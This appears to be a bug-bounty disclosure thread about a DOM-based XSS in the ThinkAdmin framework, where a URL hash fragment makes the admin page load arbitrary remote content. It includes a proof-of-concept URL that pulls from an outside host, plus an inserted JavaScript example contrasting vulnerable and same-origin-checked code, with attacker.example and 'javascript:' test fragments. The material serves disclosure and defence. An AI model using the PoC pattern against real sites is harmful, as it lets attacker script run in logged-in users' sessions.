Cross-site Scripting (XSS) - DOM in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021


Description

DOM-based XSS via URL hash fragment

Proof of Concept

First log in to https://v6.thinkadmin.top, then visit https://v6.thinkadmin.top/admin.html#https://bbounty.000webhostapp.com/cors.php?id=xxxxx2 and see that the XSS is executed.

Impact

DOM-based XSS via URL hash fragment

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 years ago
邹景立 has invalidated this vulnerability 2 years ago

The framework design needs to use the hash to load page resources and allows the use of JavaScript. Therefore, such problems are inevitable and need to be used.

The disclosure bounty has been dropped
The fix bounty has been dropped
ranjit-git
2 years ago

Researcher


If you want to load the hash fragment, then only allow the server URL.
Here you can see I can set any arbitrary URL and it will fetch data.

ranjit-git
2 years ago

Researcher


Here in my PoC URL you can see it fetches any URL. But you need to set the URL to be fetched from your own server.
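The two comments above describe the pattern and its fix: the page takes whatever follows `#` in the URL and fetches it, so the fix is to accept only resources on the site's own origin. The block below is an added example, not ThinkAdmin's code and not the fix in the referenced commit; it assumes a single-page layout where the fragment names the page resource to load, and the function names (`pickTargetUnsafe`, `pickTargetSafe`) and sample fragments are this example's own constructions.

```javascript
// Added example (not ThinkAdmin's own code). Shows the unvalidated hash-to-URL
// pattern the report describes beside a same-origin check that rejects
// attacker-chosen targets. All function names and sample inputs are constructed.

// Vulnerable pattern: whatever sits after "#" is used verbatim as the URL to
// fetch, so a link like "/admin.html#https://attacker.example/page" makes the
// page request and render a cross-origin response (with its scripts).
function pickTargetUnsafe(hash) {
  return hash.startsWith('#') ? hash.slice(1) : hash; // no validation at all
}

// Hardened pattern: resolve the fragment against the page's own origin and
// accept it only when the result still lives on that origin over http(s).
// Returns the path (plus query) to fetch, or null when the fragment is rejected.
function pickTargetSafe(hash, pageOrigin) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  if (raw === '') return null;

  let target;
  try {
    // A relative path ("admin/user.html", "/x?y=1") resolves to pageOrigin.
    // An absolute URL, a protocol-relative "//host/..." or a "javascript:"
    // URL keeps its own origin, which the check below then rejects.
    target = new URL(raw, pageOrigin);
  } catch (e) {
    return null; // unparsable fragment
  }

  if (target.protocol !== 'http:' && target.protocol !== 'https:') return null;
  if (target.origin !== new URL(pageOrigin).origin) return null;

  // Hand back only path + query, never the caller-supplied string itself.
  return target.pathname + target.search;
}

// Stand-alone demo over constructed fragments (in a browser, the first argument
// would be window.location.hash and the second window.location.origin).
const demoOrigin = 'https://v6.thinkadmin.top';
const demoHashes = [
  '#admin/user/index.html',                 // relative page resource: accepted
  '#/admin/user/index.html?page=2',         // absolute path on same origin: accepted
  '#https://v6.thinkadmin.top/admin/x.html', // full same-origin URL: accepted
  '#https://attacker.example/cors.php?id=1', // cross-origin: rejected
  '#//attacker.example/x',                  // protocol-relative: rejected
  '#javascript:alert(1)',                   // script URL: rejected
];
for (const h of demoHashes) {
  console.log(JSON.stringify(h), '->', pickTargetSafe(h, demoOrigin));
}
```

The point of resolving with `new URL(raw, pageOrigin)` rather than string-matching is that it normalises the awkward forms (protocol-relative URLs, `javascript:` schemes, `..` segments) before the origin comparison, so the check does not depend on the fragment's spelling.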

邹景立
2 years ago

Maintainer


I'm very sorry. After careful consideration, I decided to fix this problem, but it has been closed and can't be marked.

ranjit-git
2 years ago

Researcher


@admin. I am asking the admin to re-open this bug so that you can validate the bug.

邹景立
2 years ago

Maintainer


OK, I also suggest the administrator to reopen it!

Jamie Slome
2 years ago

Admin


I have updated the report to pending - feel free to mark it as you please!

邹景立 validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 marked this as fixed with commit 4469f7 2 years ago
邹景立 has been awarded the fix bounty
This vulnerability will not receive a CVE
0x9x
2 years ago

Nice find !

Jamie Slome
2 years ago

Admin


@maintainer - just jumping in here!

We just want to know if you perceive this report to be a duplicate of:

https://huntr.dev/bounties/5c129785-cf80-4123-b869-3945b386139a/

邹景立
2 years ago

Maintainer


@admin Confirm duplicate report.

0x9x
2 years ago

I confirm the duplicated report, but not the verbose error reported in my original report. So I hope you can also accept my report.

Jamie Slome
2 years ago

Admin


As we are in a unique situation, would both researchers be happy to split the bounty for the disclosure, half/half?
